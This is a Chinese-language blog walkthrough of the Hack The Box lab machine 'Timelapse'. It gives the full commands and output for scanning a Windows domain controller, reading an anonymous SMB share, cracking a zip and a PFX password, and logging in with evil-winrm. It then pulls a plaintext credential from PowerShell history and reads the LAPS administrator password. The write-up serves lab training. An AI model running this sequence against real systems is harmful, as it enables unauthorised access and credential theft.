Hacker the Box Timelaps

Timelaps

打开环境IP为10.129.227.105

image-20231226140905056

先用nmap扫下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
nmap -A -sT -Pn 10.129.227.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 14:10 CST
Nmap scan report for bogon (10.129.227.105)
Host is up (0.41s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-26 14:11:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-12-26T14:12:04
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h59m55s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.11 seconds

发现开了不少端口首先能得知这是个Windows系统,53上的 Domain,88 上的 kerberos-sec 和 389 的ldap 得知有域。

查看Shares文件夹里面的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
smbclient -N \\\\10.129.227.105\\Shares
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 23:39:15 2021
  ..                                  D        0  Mon Oct 25 23:39:15 2021
  Dev                                 D        0  Tue Oct 26 03:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 23:48:42 2021

                6367231 blocks of size 4096. 1407914 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Tue Oct 26 03:40:06 2021
  ..                                  D        0  Tue Oct 26 03:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 23:46:42 2021

                6367231 blocks of size 4096. 1410285 blocks available
smb: \Dev\> cd ../HeipDesk
cd \HeipDesk\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \Dev\> ls
  .                                   D        0  Tue Oct 26 03:40:06 2021
  ..                                  D        0  Tue Oct 26 03:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 23:46:42 2021

                6367231 blocks of size 4096. 1411840 blocks available
smb: \Dev\> cd ../HelpDesk
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 23:48:42 2021
  ..                                  D        0  Mon Oct 25 23:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 22:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 22:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 22:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 22:57:44 2021

                6367231 blocks of size 4096. 1414662 blocks available
smb: \HelpDesk\>

发现有不少内容,先下载下来再说,有个压缩包,发现有密码,先爆破一下,爆破出密码为

1
2
3
4
fcrackzip -D -p /home/kali/文档/rockyou.txt -u winrm_backup.zip


PASSWORD FOUND!!!!: pw == supremelegacy

得到一个pfk文件发现需要密码,破解一下得到密码为:thuglegacy

1
2
3
4
5
6
7
8
9
10
11
john pfx.john --wordlist=/home/kali/文档/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:00:07 DONE (2023-12-26 15:25) 0.1328g/s 429726p/s 429726c/s 429726C/s thyriana..thomasfern
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

再次导出私钥

1
2
3
openssl pkcs12 -in legacyy_dev_auth.pfx -nodes -out server.pem
openssl rsa -in server.pem -out server.key
openssl x509 -in server.pem -out server.crt

输入这个evil-winrm -c server.crt -k server.key -i 10.129.227.105 -S,在里面找到user.txt文件

提权

使用获取的新用户登录

1
2
3
4
5
6
7
8
9
10
11
 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

查看用户所属组,发现用户所属组为LAPS_Readers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

读取密码,密码为%mrbV/o.7OYppk/5#n551gaF

1
2
3
4
5
6
7
8
9
10
11
12
13
Get-ADComputer DC01 -property 'ms-mcs-admpwd'


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : %mrbV/o.7OYppk/5#n551gaF
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :

切换管理员用户登录evil-winrm -i 10.129.227.105 -u administrator -p ‘%mrbV/o.7OYppk/5#n551gaF’ -S

在Desktop里面发现什么都没有,在Users目录下发现TRX目录,在里面发现root.txt文件

image-20231226163537676

#HTB
Hacker the Box Timelaps
https://www.mrdang.icu/2024/03/28/Hacker-the-Box-Timelaps/
作者
Mr.Dang
发布于
2024年3月28日
许可协议